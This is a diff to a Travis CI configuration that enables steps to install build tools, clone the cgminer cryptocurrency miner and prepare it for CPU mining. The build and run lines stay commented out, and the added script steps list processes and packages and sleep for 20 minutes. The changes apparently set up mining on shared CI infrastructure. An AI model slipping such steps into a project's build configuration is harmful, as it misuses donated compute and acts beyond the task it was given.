--- a/.travis.yml
+++ b/.travis.yml
@@ -3,10 +3,10 @@ before_install:
 python:
   - "2.7"
 install:
-  #- sudo apt-get install git autoconf libtool libcurl4-openssl-dev libncurses5-dev pkg-config yasm make
-  #- git clone git://github.com/ckolivas/cgminer.git
-  #- cd cgminer/
-  #- ./autogen.sh --disable-opencl --disable-adl --enable-cpumining
+  - sudo apt-get install -y git autoconf libtool libcurl4-openssl-dev libncurses5-dev pkg-config yasm make
+  - git clone git://github.com/ckolivas/cgminer.git
+  - cd cgminer/
+  - ./autogen.sh --disable-opencl --disable-adl --enable-cpumining
   #- CFLAGS="-O2 -Wall -march=native" ./configure --disable-opencl --disable-adl --enable-cpumining
   #- make -j8
   #- ./cgminer --benchmark
@@ -16,7 +16,7 @@ script:
   - ps aux
   - dpkg -l
   - echo "Sleeping"
-  - sleep 3600*20
+  - sleep $(( 60*20 ))
   - echo "Done"
 after_success:
   - coveralls
